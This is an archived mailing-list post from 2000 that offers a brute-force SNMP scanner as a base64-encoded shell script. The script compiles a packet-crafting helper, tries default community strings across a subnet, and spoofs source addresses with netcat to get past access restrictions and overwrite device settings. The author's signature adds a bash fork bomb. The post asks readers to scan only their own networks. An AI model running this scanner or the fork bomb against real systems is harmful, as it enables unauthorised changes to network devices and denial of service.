Re: cisco/ascend snmp config tool or exploit? -- Re: snmp

From: Michal Zalewski (lcamtufat_private)
Date: Sun Feb 20 2000 - 11:11:23 PST

  • Next message: Andrew Bennett: "Re: ebay sends passwords in the clear" 

      This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mimeat_private for more info.

--8323328-1309335390-951073883=:993
Content-Type: TEXT/PLAIN; charset=US-ASCII


Hmm, to keep you busy, here's brute-force spoofing scanner for writable
snmp communities. Requires NetCat and snmp tools (like snmpget) to be
installed. Scanning is mostly harmless - it tries to change
system.sysContact.0 to 'null' using common default communities (according
to securityfocus). Should be run as root.

In addition to list of machines given in initial post, it is known to
break some Cisco systems (but not recent IOSes, at least not in default
configuration), most of 3com products (there was another writable
community, which seems to be present everywhere, regardless of 'private',
which is disabled by administrators sometimes), HP switches, printers,
Ascend *DSL modems etc. Also, it should bypass most of stupid source IP
address restrictions for accessing the community.

Please use this tool to scan your network only.

_______________________________________________________
Michal Zalewski * [lcamtufat_private] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 551 45 93] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=

--8323328-1309335390-951073883=:993
Content-Type: TEXT/PLAIN; charset=US-ASCII; name=snmpscan
Content-Transfer-Encoding: BASE64
Content-ID: <lcamtuf.4.05.10002202011230.993at_private>
Content-Description:
Content-Disposition: attachment; filename=snmpscan

IyEvYmluL3NoDQoNCnJtIC1mIC53YWxrLnRtcCogL3RtcC9zcG9vZi0qIFdZ
U1pMTyAmPi9kZXYvbnVsbA0KDQplY2hvICJzbm1wZCB2dWxuZXJhYmlsaXR5
IHNjYW5uZXIgYnkgPGxjYW10dWZAYWdzLnBsPiINCmVjaG8NCg0KeD0kMQ0K
UFJFPSQyDQoNCmlmIFsgIiQyIiA9ICIiIF07IHRoZW4NCiAgZWNobyAiVXNh
Z2U6ICQwIHN0YXJ0X2F0IGNfc3VibmV0Ig0KICBlY2hvICJleGFtcGxlOiAn
JDAgMCAxNzIuMTYuMScgd2lsbCBzY2FuIDE3Mi4xNi4xLjAtMjU1LiINCiAg
ZWNobw0KICBleGl0IA0KZmkNCg0KU1BGSUxFPSIvdG1wL3Nwb29mLSQkIg0K
DQpjYXQgPiRTUEZJTEUuYyA8PF9FT0ZfDQpjaGFyIGJ1ZlsxMDAwXTsNCmNo
YXIgcGFydDFbXT0iMFwyMDJcMC1cMlwxXDBcNCI7DQpjaGFyIHBhcnQyW109
IlwyNDNcMzdcMlwxXDFcMlwxXDBcMlwxXDAwMDBcMDI0MFwyMDJcMFwyMFw2
XDEwK1w2XDFcMlwxXDFcNFwwXDRcNG51bGwiOw0KbWFpbihpbnQgYXJnYyxj
aGFyKiphcmd2KSB7DQogIGNoYXIgeD1zdHJsZW4oYXJndlsxXSk7DQogIG1l
bWNweShidWYscGFydDEsc2l6ZW9mKHBhcnQxKS0xKTsNCiAgbWVtY3B5KGJ1
ZitzaXplb2YocGFydDEpLTEsJngsMSk7DQogIHN0cmNweShidWYrc2l6ZW9m
KHBhcnQxKSxhcmd2WzFdKTsNCiAgbWVtY3B5KGJ1ZitzaXplb2YocGFydDEp
K3gscGFydDIsc2l6ZW9mKHBhcnQyKS0xKTsNCiAgd3JpdGUoMSxidWYseCsx
K3NpemVvZihwYXJ0MSkrc2l6ZW9mKHBhcnQyKSk7DQp9DQpfRU9GXw0KDQpl
Y2hvICJDb21waWxpbmcgaGVscGVyIGFwcGxpY2F0aW9uLi4uIg0KDQpnY2Mg
LW8gJFNQRklMRSAkU1BGSUxFLmMNCg0KdGVzdCAteCAkU1BGSUxFIHx8IGV4
aXQNCg0KZWNobyAiU2NhbiByYW5nZTogJFBSRS4keC0yNTUuLi4iDQoNCmlm
IFsgIiQxIiA9ICIwIiBdOyB0aGVuDQogIGVjaG8gIiogQ29sbGVjdGluZyBy
b3V0aW5nIGluZm9ybWF0aW9uICg2IHNlY29uZHMpLi4uIg0KICAvdXNyL3Ni
aW4vdHJhY2Vyb3V0ZSAtbiAtZiAzIC13IDYwICRQUkUuMzIgMj4vZGV2L251
bGwgPi53YWxrLnRtcCAmDQogIHNsZWVwIDYgDQogIGtpbGxhbGwgdHJhY2Vy
b3V0ZSAmPi9kZXYvbnVsbA0KICBhd2sgJ3twcmludCAkMn0nIC53YWxrLnRt
cCA+LndhbGsudG1wMg0KZmkNCg0KZWNobyAiU3RhcnRpbmcgc2Nhbi4gT3V0
ZmlsZSBpczogV1lTWkxPIg0KDQp3aGlsZSBbICIkeCIgLWx0ICIyNTYiIF07
IGRvDQogIGVjaG8gJFBSRS4keCA+Pi53YWxrLnRtcDINCiAgbGV0IHg9eCsx
DQpkb25lDQoNCkNPTU1VTklUSUVTPSJwdWJsaWMgcHJpdmF0ZSB3cml0ZSBh
bGwgbW9uaXRvciBhZ2VudCBtYW5hZ2VyIE9yaWdFcXVpcE1mciBhZG1pbiBk
ZWZhdWx0IHBhc3N3b3JkIHRpdm9saSBvcGVudmlldyBjb21tdW5pdHkgc25t
cCBzbm1wZCBzeXN0ZW0iDQoNCmZvciBpIGluIGBjYXQgLndhbGsudG1wMmA7
IGRvDQogIGVjaG8gLW4gIiRpOiAiDQogIHNubXBnZXQgLVIgMiAkaSBwdWJs
aWMgc3lzdGVtLnN5c0Rlc2NyLjAgJj4ud2Fsay50bXANCiAgRVJSPSJgZ3Jl
cCAtYyAtaUUgJ3JlZnVzZXxlcnJvcnx0aW1lb3V0fGZhaWx8ZGVuaWVkfGZv
dW5kfGFjY2UnIC53YWxrLnRtcGAiDQogIGlmIFsgIiRFUlIiID0gIjAiIF07
IHRoZW4NCiAgICBlY2hvICJPSyINCiAgICBlY2hvIC1uICIgIHN5c3RlbTog
Ig0KICAgIGF3ayAtRiciJyAne3ByaW50ICQyfScgLndhbGsudG1wID4ud2Fs
ay50bXAyDQogICAgU1lTPSJgY2F0IC53YWxrLnRtcDJgIg0KICAgIGVjaG8g
IiRTWVMiDQogICAgc25tcGdldCAtUiAyICRpIHB1YmxpYyBzeXN0ZW0uc3lz
RGVzY3IuMCAmPi53YWxrLnRtcA0KICAgIGF3ayAtRiciJyAne3ByaW50ICQy
fScgLndhbGsudG1wID4ud2Fsay50bXAyDQogICAgU1lTTkFNRT0iYGF3ayAn
e3ByaW50ICQxfScgLndhbGsudG1wMmAiDQogICAgIGVjaG8gIiRpICgkU1lT
KToiID4+V1lTWkxPDQogICAgIGZvciBqIGluICRDT01NVU5JVElFUyAnYWxs
IHByaXZhdGUnICdTZWNyZXQgQzBkZScgJFNZU05BTUU7IGRvDQogICAgICBl
Y2hvIC1uICIgICRqPiAiDQogICAgICAkU1BGSUxFICIkaiIgfCBuYyAtdSAk
aSAxNjEgJj4vZGV2L251bGwgJg0KICAgICAgJFNQRklMRSAiJGoiIHwgbmMg
LXMgMTI3LjAuMC4xIC11ICRpIDE2MSAmPi9kZXYvbnVsbCAmDQogICAgICAk
U1BGSUxFICIkaiIgfCBuYyAtcyAkaSAtdSAkaSAxNjEgJj4vZGV2L251bGwg
Jg0KICAgICAgJFNQRklMRSAiJGoiIHwgbmMgLXMgJFBSRS4xIC11ICRpIDE2
MSAmPi9kZXYvbnVsbCAmDQogICAgICBzbGVlcCAxDQogICAgICBraWxsYWxs
IG5jICY+L2Rldi9udWxsDQogICAgICBzbm1wZ2V0IC1SIDIgJGkgcHVibGlj
IHN5c3RlbS5zeXNDb250YWN0LjAgJj4ud2Fsay50bXANCiAgICAgIFdPUktF
RD0iYGdyZXAgLWMgbnVsbCAud2Fsay50bXAgMj4vZGV2L251bGxgIg0KICAg
ICAgaWYgWyAiJFdPUktFRCIgPSAiMCIgXTsgdGhlbg0KICAgICAgICBlY2hv
ICIgIC0gJGogZmFpbGVkLiIgPj5XWVNaTE8NCiAgICAgICAgZWNobyAiZmFp
bGVkLiINCiAgICAgIGVsc2UNCiAgICAgICAgZWNobyAiT0siDQogICAgICAg
IGVjaG8gIiAgLSAkaiBXT1JLRUQuIiA+PldZU1pMTw0KICAgICAgICBicmVh
aw0KICAgICAgZmkNCiAgICBkb25lDQogIGVsc2UNCiAgICBlY2hvICJtaWxj
enkuLi4iDQogIGZpDQpkb25lDQoNCmVjaG8gIkRvbmUuIg0Kcm0gLWYgLndh
bGsudG1wKiAkU1BGSUxFKg0KIA0K
--8323328-1309335390-951073883=:993--

    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:36:14 PDT